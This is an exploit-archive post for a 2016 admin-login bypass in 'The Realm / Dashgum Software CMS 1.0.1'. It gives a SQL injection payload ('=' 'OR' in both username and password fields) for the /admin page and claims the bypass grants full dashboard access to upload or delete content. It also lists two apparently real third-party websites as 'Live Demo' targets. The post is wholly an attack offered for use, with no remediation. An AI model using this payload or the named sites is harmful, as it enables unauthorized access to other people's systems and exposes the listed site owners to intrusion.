Home / os / winmobile

The Realm / Dashgum Software CMS 1.0.1 SQL Injection

Posted on 12 July 2016

###################### # Exploit Title : The Realm / Dashgum Software CMS Admin Page ByPass # Exploit Author : xBADGIRL21 # version The Realm : 1.0.1 # version Dashgum : v2 # Vendor : http://www.bluthemes.com/item/realm - http://gridgum.com/themes/dashgum-bootstrap-dashboard/ # Tested on: [ Windows ] # skype:xbadgirl21 # Date: 2016/07/10 # video Proof : https://youtu.be/u8CDfPSbwOI ###################### # Describe : # This Exploit Allow The Attacker to bypass the admin # page info. # Login to the admin Dashboard Give you Full Access to # Upload or Delete .....etc # PoC: # Put [admin] After url such as : # http://site.com/admin # Now enter fill username or email and Password like the information below : # Username: '=' 'OR' # Password: '=' 'OR' # # Live Demo : # http://khasbagh.com/admin/ # http://www.linikantech.com/admin/ # ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################

 

TOP